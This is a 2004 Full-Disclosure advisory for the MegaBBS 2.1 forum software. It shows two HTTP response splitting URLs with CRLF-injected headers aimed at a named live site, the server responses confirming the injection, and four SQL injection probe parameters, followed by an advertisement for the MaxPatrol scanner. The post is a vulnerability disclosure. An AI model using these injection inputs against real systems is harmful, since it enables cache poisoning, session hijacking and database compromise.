URL: http://www.pd9soft.com 
Tested megabbs 2.1 

1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fid=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat

Result:

<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:14:02 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:13:02 GMT 
Set-Cookie: guestID=309; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/ 
Cache-contro
<...>


2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/html%3e
%0d%0a&action=writenew&displaytype=flat

Result:
<...>
HTTP/1.1 302 Object moved 
Connection: close 
Date: Sun, 26 Sep 2004 14:34:05 GMT 
Server: Microsoft-IIS/6.0 
Location: /megabbs/forums/forum-view.asp?fid= 
Content-Length: 0 

HTTP/1.0 200 OK 
Content-Type: text/html 
Content-Length: 33 

<html>Scanned by Maxpatrol</html> 

Content-Length: 290 
Content-Type: text/html 
Expires: Sun, 26 Sep 2004 14:33:05 GMT 
Set-Cookie: guestID=421; path=/ 
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/ 
Cache-contro
<...>

3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1' 
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'


MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html